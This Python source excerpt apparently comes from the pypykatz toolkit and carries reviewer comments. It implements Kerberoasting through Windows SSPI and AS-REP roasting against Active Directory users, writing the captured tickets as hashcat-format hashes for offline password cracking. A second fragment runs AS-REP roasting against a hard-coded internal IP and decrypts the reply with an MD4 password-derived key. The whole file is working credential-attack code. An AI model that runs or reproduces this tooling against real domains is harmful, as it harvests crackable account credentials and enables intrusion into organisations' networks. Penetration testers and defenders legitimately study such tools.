def run_live(self, args) -> None:
    """Run the ``spnroast`` / ``asreproast`` subcommands using the current Windows session.

    Targets are built from ``args.target_file`` (one ``<realm>/<username>`` or
    bare ``<username>`` per line) and/or ``args.target_user`` (same format); at
    least one of the two must be given. An explicit ``args.realm`` overrides any
    ``<realm>/`` prefix on a target, and a target that ends up with no realm is
    rejected with an exception.

    ``spnroast`` requests one service ticket per target through SSPI and
    converts it to hashcat format; a failure for one target is recorded and
    printed at the end instead of aborting the run. ``asreproast`` hands the
    whole target list to ``APREPRoast`` over a ``KerberosSocket``; errors on
    that path are not caught here and propagate to the caller. Results are
    written to ``args.out_file`` (CRLF line endings) when set, otherwise
    printed to stdout.

    Args:
        args: parsed CLI namespace; this method reads ``cmd``, ``target_file``,
            ``target_user``, ``realm``, ``dc_ip`` and ``out_file``.

    Raises:
        Exception: when no targets are supplied, or when a target has no realm.
    """
    # Imports are local so the module stays importable on non-Windows hosts
    # (winsspi / LiveMachine are only usable there) -- presumably; verify.
    from winsspi.sspi import KerberoastSSPI
    from minikerberos.security import TGSTicket2hashcat, APREPRoast
    from minikerberos.utils import TGTTicket2hashcat
    from minikerberos.communication import KerberosSocket
    from minikerberos.common import KerberosTarget
    from pypykatz.commons.winapi.machine import LiveMachine

    if not args.target_file and not args.target_user:
        raise Exception('No targets loaded! Either -u or -t MUST be specified!')

    machine = LiveMachine()
    # NOTE(review): ``realm`` is assigned here but never read below -- the
    # target parsing checks ``args.realm`` directly, so the get_domain()
    # fallback does NOT apply to targets; a target without a ``<realm>/``
    # prefix still fails unless -r is given.
    realm = args.realm
    if not args.realm:
        realm = machine.get_domain()

    if args.cmd in ['spnroast', 'asreproast']:
        targets = []
        if args.target_file:
            with open(args.target_file, 'r') as f:
                for line in f:
                    # NOTE(review): blank lines are not skipped; they become
                    # targets with an empty username.
                    line = line.strip()
                    domain = None
                    username = None
                    if line.find('/') != -1:
                        # we take for granted that usernames do not have the
                        # char / in them! (a second '/' makes split() raise
                        # ValueError on the unpack)
                        domain, username = line.split('/')
                    else:
                        username = line
                    # -r wins over any realm given in the file.
                    if args.realm:
                        domain = args.realm
                    else:
                        if domain is None:
                            raise Exception(
                                'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                            )
                    target = KerberosTarget()
                    target.username = username
                    target.domain = domain
                    targets.append(target)

        if args.target_user:
            # Same parsing as the file branch, applied to each -u value.
            for user in args.target_user:
                domain = None
                username = None
                if user.find('/') != -1:
                    # we take for granted that usernames do not have the char /
                    # in them!
                    domain, username = user.split('/')
                else:
                    username = user
                if args.realm:
                    domain = args.realm
                else:
                    if domain is None:
                        raise Exception(
                            'Realm is missing. Either use the -r parameter or store the target users in <realm>/<username> format in the targets file'
                        )
                target = KerberosTarget()
                target.username = username
                target.domain = domain
                targets.append(target)

        results = []
        errors = []
        if args.cmd == 'spnroast':
            # One SSPI context per target; a failed ticket request is kept in
            # ``errors`` (reported below) rather than stopping the loop.
            for spn_name in targets:
                ksspi = KerberoastSSPI()
                try:
                    ticket = ksspi.get_ticket_for_spn(spn_name.get_formatted_pname())
                except Exception as e:
                    errors.append((spn_name, e))
                    continue
                results.append(TGSTicket2hashcat(ticket))

        elif args.cmd == 'asreproast':
            # Without --dc-ip the *domain name* from get_domain() is passed as
            # the socket target; presumably KerberosSocket resolves it -- verify.
            dcip = args.dc_ip
            if args.dc_ip is None:
                dcip = machine.get_domain()
            ks = KerberosSocket(dcip)
            ar = APREPRoast(ks)
            # Replaces the empty ``results`` list; ``errors`` stays empty on
            # this path because nothing here is caught.
            results = ar.run(targets)

        if args.out_file:
            with open(args.out_file, 'w') as f:
                for thash in results:
                    f.write(thash + '\r\n')
        else:
            for thash in results:
                print(thash)

        for err in errors:
            print('Failed to get ticket for %s. Reason: %s' % (err[0], err[1]))

    # ``logging`` is not imported in this method; assumed to be a module-level
    # import (not visible in this span).
    logging.info('SSPI based Kerberoast complete')
# Ad-hoc harness: runs APREPRoast against a hard-coded host with two
# placeholder credentials, then decrypts the first returned blob with a key
# derived from a placeholder password and prints the plaintext as hex.
# KerberosCredential, KerberosSocket, APREPRoast, _enctype_table and Key are
# not defined in this span; they are assumed to be imported earlier in the file.
import hashlib

# Username/password/domain values below are redacted placeholders as given.
ccred = KerberosCredential()
ccred.username = '******'
ccred.domain = 'TEST.corp'
ccred2 = KerberosCredential()
ccred2.username = '******'
ccred2.domain = 'TEST.corp'
creds = [ccred, ccred2]

# Hard-coded target address; nothing here validates reachability, so a
# connection failure surfaces as whatever KerberosSocket raises.
ks = KerberosSocket('192.168.9.1')
ar = APREPRoast(ks)
res = ar.run(creds)
# Assumes at least one result came back; an empty list raises IndexError here.
rep = res[0]
print(res)

# The result is a '$'-separated string; only the last three fields are used
# (the first two are discarded). Field meanings are presumed from their names.
x, a, enctype, checksum, data = rep.split('$')
password = '******'
cipher = _enctype_table[int(enctype)]
# Key material is MD4 over the UTF-16-LE password. NOTE(review): 'md4' is
# not available on every hashlib build (e.g. OpenSSL 3 without the legacy
# provider) and then raises ValueError.
key = Key(int(enctype), hashlib.new('md4', password.encode('utf-16-le')).digest())
cipherText = bytes.fromhex(checksum + data)
# The literal 3 is presumably the Kerberos key-usage number expected by
# cipher.decrypt -- verify against the minikerberos API.
temp = cipher.decrypt(key, 3, cipherText)
print()
print()
print(temp.hex())